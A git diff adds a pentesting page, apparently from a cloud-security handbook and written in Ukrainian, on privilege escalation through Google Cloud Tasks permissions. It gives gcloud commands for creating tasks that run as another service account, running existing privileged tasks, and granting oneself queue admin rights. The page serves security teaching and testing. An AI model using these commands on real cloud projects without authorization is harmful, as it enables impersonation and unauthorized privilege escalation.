diff --git a/src/SUMMARY.md b/src/SUMMARY.md index 66a6a8fd8..7e7cc6609 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -107,6 +107,7 @@ - [GCP - Cloudfunctions Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) - [GCP - Cloudidentity Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudidentity-privesc.md) - [GCP - Cloud Scheduler Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) + - [GCP - Cloud Tasks Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md) - [GCP - Compute Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/README.md) - [GCP - Add Custom SSH Metadata](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-compute-privesc/gcp-add-custom-ssh-metadata.md) - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md new file mode 100644 index 000000000..9d34a222a --- /dev/null +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudtasks-privesc.md @@ -0,0 +1,45 @@ +# GCP - Cloud Tasks Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Cloud Tasks + +### `cloudtasks.tasks.create`, `iam.serviceAccounts.actAs` + +Зловмисник з цими дозволами може **вдаватися до інших облікових записів служби**, створюючи завдання, які виконуються з ідентичністю вказаного облікового запису служби. Це дозволяє надсилати **автентифіковані HTTP-запити до сервісів Cloud Run або Cloud Functions, захищених IAM**. +```bash +gcloud tasks create-http-task \ +task-$(date '+%Y%m%d%H%M%S') \ +--location us-central1 \ +--queue \ +--url 'https://.us-central1.run.app' \ +--method POST \ +--header 'X-Hello: world' \ +--body-content '{"hello":"world"}' \ +--oidc-service-account-email @.iam.gserviceaccount.com +``` +### `cloudtasks.tasks.run`, `cloudtasks.tasks.list` + +Зловмисник з цими правами може **виконувати існуючі заплановані завдання** без наявності прав на обліковий запис служби, пов'язаний із завданням. Це дозволяє виконувати завдання, які були раніше створені з обліковими записами служби з вищими привілеями. +```bash +gcloud tasks run projects//locations/us-central1/queues//tasks/ +``` +Основний, який виконує цю команду, **не потребує дозволу `iam.serviceAccounts.actAs`** на обліковий запис служби завдання. Однак це лише дозволяє виконувати існуючі завдання - це не надає можливості створювати або змінювати завдання. + +### `cloudtasks.queues.setIamPolicy` + +Зловмисник з цим дозволом може **надавати собі або іншим основним ролі Cloud Tasks** на конкретних чергах, потенційно підвищуючи до `roles/cloudtasks.admin`, що включає можливість створювати та виконувати завдання. +```bash +gcloud tasks queues add-iam-policy-binding \ + \ +--location us-central1 \ +--member serviceAccount:@.iam.gserviceaccount.com \ +--role roles/cloudtasks.admin +``` +Це дозволяє зловмиснику надати повні адміністративні права Cloud Tasks на чергу будь-якому обліковому запису служби, яким вони керують. + +## Посилання + +- [Документація Google Cloud Tasks](https://cloud.google.com/tasks/docs) + +{{#include ../../../banners/hacktricks-training.md}}